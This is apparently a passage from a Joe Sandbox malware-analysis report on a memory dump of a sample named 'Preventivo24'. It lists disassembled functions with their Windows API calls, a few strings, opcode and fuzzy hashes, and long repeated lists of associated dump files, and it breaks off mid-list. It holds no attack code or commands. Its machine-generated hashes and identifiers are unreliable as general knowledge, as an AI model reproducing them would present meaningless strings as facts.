                                                                              • String ID: ) AND ( $Show$gfff
                                                                              • API String ID: 0-344708357
                                                                              • Opcode ID: ec4dd059f6e589528059a8c5a285f24ad85bf80815783f3a6b07ee6725440685
                                                                              • Instruction ID: 998fef17642abdcf56d11d8803b60beb07537e65fde48109482a74d3bb95fbef
                                                                              • Opcode Fuzzy Hash: ec4dd059f6e589528059a8c5a285f24ad85bf80815783f3a6b07ee6725440685
                                                                              • Instruction Fuzzy Hash: B7D19A71904268CFEB24DF68C905BAEBBF1BF45304F1486D9D449BB281DB70AA84CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(011D0098), ref: 00FF687F
                                                                                • Part of subcall function 00E8B400: GetProcessHeap.KERNEL32 ref: 00E8B455
                                                                              Strings
                                                                              • %04d-%02d-%02d %02d-%02d-%02d, xrefs: 00FF68CD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: HeapLocalProcessTime
                                                                              • String ID: %04d-%02d-%02d %02d-%02d-%02d
                                                                              • API String ID: 1554148984-3768011868
                                                                              • Opcode ID: 8231dd2e6f07ddee157aeb4943c5fc0f587bdb25c31cdde83d3d6378da9aba5d
                                                                              • Instruction ID: 635891135d2ac077d8a06c0503af607ddd2ad81872e5368d62aaf56291dc932d
                                                                              • Opcode Fuzzy Hash: 8231dd2e6f07ddee157aeb4943c5fc0f587bdb25c31cdde83d3d6378da9aba5d
                                                                              • Instruction Fuzzy Hash: 20218EB1D04208AFDB14DF99D941BAEFBF8EB0C710F10412AF915A3280EB745950CB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
                                                                              • Instruction ID: 42c719344361b366c163dc61ed5fe94287d773383705201b468507cae851dfa9
                                                                              • Opcode Fuzzy Hash: 89d43bcd608003b685ae1a0886c5230780c6e278220e293941602e4ddc60863e
                                                                              • Instruction Fuzzy Hash: 6DF14F71E00219DFDF14CF68C990AAEBBF2FF88324F1582A9D955AB391D7309901DB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,00000000,?,?,00000003,B5580983,00000000,?,00000000), ref: 00FE3304
                                                                              • FindClose.KERNEL32(00000000,?,00000000), ref: 00FE334F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 4d398e4a4bfbbe200c5d80db638209cf249486eba66db811da41f17ca2e3ab62
                                                                              • Instruction ID: f0f8fd4d254955e4f47d71e79c4a99462c7f282a9378c88e2ba1267077300342
                                                                              • Opcode Fuzzy Hash: 4d398e4a4bfbbe200c5d80db638209cf249486eba66db811da41f17ca2e3ab62
                                                                              • Instruction Fuzzy Hash: E251AE71900649CFDB24DF69C959BAEBBF0FF48314F10411DE829AB381DB349A05CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000,B5580983,?,00000000), ref: 00FC0B3B
                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00FC0B45
                                                                                • Part of subcall function 00E8B070: RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateErrorFormatHeapLastMessage
                                                                              • String ID:
                                                                              • API String ID: 4114510652-0
                                                                              • Opcode ID: 7cdc16a95ac59c8a30fad74f2f82d5ecdacd9d00365b648a4c376f405212e0b7
                                                                              • Instruction ID: d40a965030d3438621701fb4da4693f37243f5b70e21cb3b329ee8ea2c0e1489
                                                                              • Opcode Fuzzy Hash: 7cdc16a95ac59c8a30fad74f2f82d5ecdacd9d00365b648a4c376f405212e0b7
                                                                              • Instruction Fuzzy Hash: 6741DD71A04209DFDB14DF98C946BAEF7F4EB84728F10026EE819E7380EBB55901CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Name${Binary Data}
                                                                              • API String ID: 0-874704490
                                                                              • Opcode ID: 55488a2a581f3825642bf7a16b4ee0af06a49b1d10f522cf84f041d8df89451b
                                                                              • Instruction ID: 1fce8c9ced3a5b92089b10db9015aee904f40812033d788837a4e20f8a4f8cd7
                                                                              • Opcode Fuzzy Hash: 55488a2a581f3825642bf7a16b4ee0af06a49b1d10f522cf84f041d8df89451b
                                                                              • Instruction Fuzzy Hash: 0C425B70D00259DFEB28DF68C995BEDBBB5BF58300F1085E9E449A7250EB74AA84CF50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetWindowLongW.USER32(00000000,000000FC), ref: 00F00634
                                                                              • SetWindowLongW.USER32(00000000,000000FC,?), ref: 00F00642
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow
                                                                              • String ID:
                                                                              • API String ID: 1378638983-0
                                                                              • Opcode ID: d14574cbb271b09bf62df2df33bbf1001a4e4ba075a37d3d73eab836dd61f7de
                                                                              • Instruction ID: cba8b8a2d957885b8c5e276b3f26d2c973f3a0cde02108dd426e9fae2301d879
                                                                              • Opcode Fuzzy Hash: d14574cbb271b09bf62df2df33bbf1001a4e4ba075a37d3d73eab836dd61f7de
                                                                              • Instruction Fuzzy Hash: C0318C71A05209EFCB14DF58C984B9ABBB5FB44320F1442A9E824AB3D1DB71EE50DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • __set_se_translator.LIBVCRUNTIME ref: 00EC5185
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0013C550), ref: 00EC519B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                              • String ID:
                                                                              • API String ID: 2480343447-0
                                                                              • Opcode ID: 2529cf519548379e534fa313bec7396bd3c20ea213ca631d02a893b7023a69e0
                                                                              • Instruction ID: 5d9811273046702e7a2749b4a148cea0ec017fdab4b9bc4abf15bbbb45202ca1
                                                                              • Opcode Fuzzy Hash: 2529cf519548379e534fa313bec7396bd3c20ea213ca631d02a893b7023a69e0
                                                                              • Instruction Fuzzy Hash: E3D022A255A380DEE7285331EA08FD13A312720306F480028F0A3002C9C3A268C9ABA3
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: gfff
                                                                              • API String ID: 0-1553575800
                                                                              • Opcode ID: c8b171e9f9ad7d19fa27b1c3aa4130ecd0878394bf6eca5547e8b1d66f430809
                                                                              • Instruction ID: f4f53be90d25581dc8985cf601fbd6ae0489261ab71bc89ffb23902f65db6821
                                                                              • Opcode Fuzzy Hash: c8b171e9f9ad7d19fa27b1c3aa4130ecd0878394bf6eca5547e8b1d66f430809
                                                                              • Instruction Fuzzy Hash: 7D124A347043618BD72C9E2CD98537DBAE7EB84310F28457DEADAC73A5E639C9848346
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise__floor_pentium4
                                                                              • String ID: unordered_map/set too long
                                                                              • API String ID: 996205981-306623848
                                                                              • Opcode ID: 76ab45cb2f084fcf216f59b810ce5789d918f5392befaaa937033a187f970537
                                                                              • Instruction ID: a941c41affa048a9ae1473bfb260723582f32910bb868a92ef0491e4074faaae
                                                                              • Opcode Fuzzy Hash: 76ab45cb2f084fcf216f59b810ce5789d918f5392befaaa937033a187f970537
                                                                              • Instruction Fuzzy Hash: AA12F6B1A002099FCB19DF68C480AADF7F9FF58310F14C26AE855EB381D735AA55DB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,00EAD0B8,?,?,?,?,?), ref: 00EAEAB0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 927feb13cdc196f5ffaeef7c434ff1efa0809a806b8f42bbc0f9bcfd650d0d11
                                                                              • Instruction ID: c8d6322d1391da7eeadcfd83de11e6e8bb92378390c374725b21f8878c316c15
                                                                              • Opcode Fuzzy Hash: 927feb13cdc196f5ffaeef7c434ff1efa0809a806b8f42bbc0f9bcfd650d0d11
                                                                              • Instruction Fuzzy Hash: FBF08230104141DEE3109B98C898B69BFB6FB8E309F4849F6E059E96A0D335EE44DF20
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71606fc60c423b215dfd1e9a594d6379437e10fd6a121e32f3f79487c1bccf5e
                                                                              • Instruction ID: 6f8697212b012e0c956a8152f8139990ae8287d873dc46ef177699f7c7c59aac
                                                                              • Opcode Fuzzy Hash: 71606fc60c423b215dfd1e9a594d6379437e10fd6a121e32f3f79487c1bccf5e
                                                                              • Instruction Fuzzy Hash: E122D3B3B543104BD75CCE5DCCA23ADB2D3ABD4218B0E853DB48AC3342EA7DD9598685
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 607c5e2a74256c465c5777d89899451b539b3dde1f9f0e2feecc6d08502e2a0d
                                                                              • Instruction ID: e66d9352cd9adcd2d58ee7d40a51bd791557b0f2ddeed5a5730b54492f9c9c11
                                                                              • Opcode Fuzzy Hash: 607c5e2a74256c465c5777d89899451b539b3dde1f9f0e2feecc6d08502e2a0d
                                                                              • Instruction Fuzzy Hash: 08127C75E002299FCB29DFA8C994AEDBBF6FF48314F194159E855B7380DB30A941CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3f12b32f11b2d32ed2570c062379da78de3c0066d191de6cf2909bd3c5e3d7de
                                                                              • Instruction ID: 85e0b3735c949f7114b1246b116384c7dde3212c252a21cdb5d4dc5c1187ecb8
                                                                              • Opcode Fuzzy Hash: 3f12b32f11b2d32ed2570c062379da78de3c0066d191de6cf2909bd3c5e3d7de
                                                                              • Instruction Fuzzy Hash: DCD101717043218FD3648F2CC88466FBBE1ABC8200F688A7EF9D5C7359E675D9458B82
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
